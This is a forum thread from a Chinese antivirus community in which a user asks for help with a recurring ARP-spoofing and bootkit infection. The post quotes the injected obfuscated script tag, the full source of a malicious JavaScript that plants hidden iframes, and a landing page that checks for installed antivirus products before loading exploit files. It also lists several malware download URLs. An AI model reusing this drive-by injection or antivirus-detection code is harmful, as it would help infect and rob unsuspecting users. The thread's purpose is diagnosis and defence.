瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 超级病毒,鬼影+ARP+下载者+??超多病毒!~!

1   1  /  1  页   跳转

[求助] 超级病毒,鬼影+ARP+下载者+??超多病毒!~!

超级病毒,鬼影+ARP+下载者+??超多病毒!~!

我的电脑很奇怪的中了这个病毒!
我的电脑在内网,上面可能有N层路由吧,学校里面的。系统是WINDOWS XP3
我的电脑在内网中,每打开个网页都会自己加一句<script language=javascript src=http://h%353.x%6Frg.%70l/a.js></script>这个代码,中了N次招,没办法,系统也重装了N次了,每次重装后,一上网就又中毒了。
所以本人怀疑是ARP病毒吧,装了ARP防火墙还是没用啊,,还是中毒,以下是本人对网站的个人分析。
1:c盘下面生成ddv2.dat各FEFS.EXE的文件夹
2:自动在C:\Program Files\Internet Explorer\IETimbar
安装IETimbar软件
3:C:\WINDOWS\UoDo下面生成game.dll
4:自动下载在SYSTEM32里面一个IME文件,且自动加栽成默认输入法。
5:system文件夹里会成生一个svchost.exe且自动加栽成服务项,开机自动启动。

用金山的鬼影专杀,可以杀到11个病毒。杀完成重启消失,可是过几个小时又有了,主要是上网又感染了病毒。

http://h54.xorg.pl/a.js    (注意前面H54是一直变动的,有时是H53或H41等,一直在变。)
新系统装了一遍又一遍,JUJUMAO,电脑公司的,IT姐妹的,龙帝国都装过了(GHOST版的),装好就中毒了,郁闷死了。
我的个人习惯,好设HAO123为首页,装好系统后一上网就自动中毒了,
电脑网页打不开,有些网页可以打开如百度的首页,可是会不时弹出这个网页:http://afv.bij.pl/33/safe/safe.html
然后查看源码才知道,原来我的电脑被劫持了,每打个网页都会在最前面加上这名代码:
<script language=javascript src=http://h%353.x%6Frg.%70l/a.js></script>
解码后是:<script language=javascript src=http://h41.xorg.pl/a.js></script>
然后我下载了:http://h41.xorg.pl/a.js
源文件内容如下:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
var vsv="fucav";
document.cookie = "Cookie1=lalaj;expires="+ Then.toGMTString()
document.write("<div style=\'dispaly:none;\' >");
document.write("<ifra"+"me src=http:\/\/afv.bij.pl\/33\/973rp.htm width=100 height=0><\/iframe>");
document.write("</div>");
}
}Get();
document.write("<ifra"+"me src=http:\/\/web.fafafa888.org:8089\/web\/sys\/mails.asp?mt=tt11 width=0 height=0><\/iframe>");
其实以上代码也含了两行主要的代码:就是http:\/\/afv.bij.pl\/33\/973rp.htm和http:\/\/web.fafafa888.org:8089\/web\/sys\/mails.asp?mt=tt11
大家可以看不懂,不过是加密了而已,其实就是http:///afv.bij.pl/33/973rp.htmhttp://web.fafafa888.org:8089/web/sys/mails.asp?mt=tt11这两行

打开:http://afv.bij.pl/33/973rp.htm原码如下:
<HTML>
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
function jc()
{
jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://C:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172','res://D:\\program%20files\\360safe\\360Safe.exe/GIF/172','res://D:\\360safe\\360Safe.exe/GIF/172','res://C:\\360safe\\360Safe.exe/GIF/172','res://E:\\program%20files\\360safe\\360Safe.exe/GIF/172','res://C:\\program%20files\\360safe\\360Safe.exe/GIF/172','res://D:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172','res://e:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172','res://f:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172'];
for ( i= 0; i<jc_list.length; i++)
{
ischeck = 1;
x = new Image();
x.src = "";
x.onerror = function()
  {
  ischeck = 0;
  }
x.src = jc_list;
if (ischeck == 1)
  return 1;
delete x;
}
return 0;
}


if (!jc())
{
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<EMBED src=iie.swf width=0 height=0>");
}
else
{
document.write("<EMBED src=fff.swf width=0 height=0>");
}
var yaom="bs";
document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
}
else
{
document.writeln("<script src=\"1.js\"><\/script>");
}
// -->
</SCRIPT>
</HTML>
<script type="text/javascript" src="http://js.tongji.linezing.com/1241363/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1241363/tongji.gif"/></a></noscript>

点击打开:http://web.fafafa888.org:8089/web/sys/mails.asp?mt=tt11之后,自动指向128.58.221.11这个IP地址是美国,可能是国内的人用的是美国的代理!
研究到这里,希望达人能给个解决办法。
后来知道了,可能是鬼影吧,用金山的杀了,新系统用金山的鬼影专杀杀了后,强一点,不过不到10分钟就又中了,我想可能是网页上自动下载的吧,我用的是360安全卫士7.0的最新版的,360实时保护还是拦截不了啊。

也会自动连接这个网站:
http://abk.bee.pl:84/d/3.exe
这个应该是个总的木马下载,下面还有很多N多小盗号木马被自动下载
如:http://abk.bee.pl:84/d/ce.exe
http://61.160.213.125:9999/1.exe
有20多个,不一一列了。


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
分享到:
gototop
 

回复:超级病毒,鬼影+ARP+下载者+??超多病毒!~!

你先按照置顶的帖子扫描日志来


使用System Repair Engineer扫描日志,将日志作为附件上传上来。
下载页面:http://www.kztechs.com/sreng/download.html

建议日志文件以附件形式发来
点击我这贴右下角的“引用”,然后就应该知道怎么发了。

那个挂马的网址自己屏蔽掉
要深入,要专一.......
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT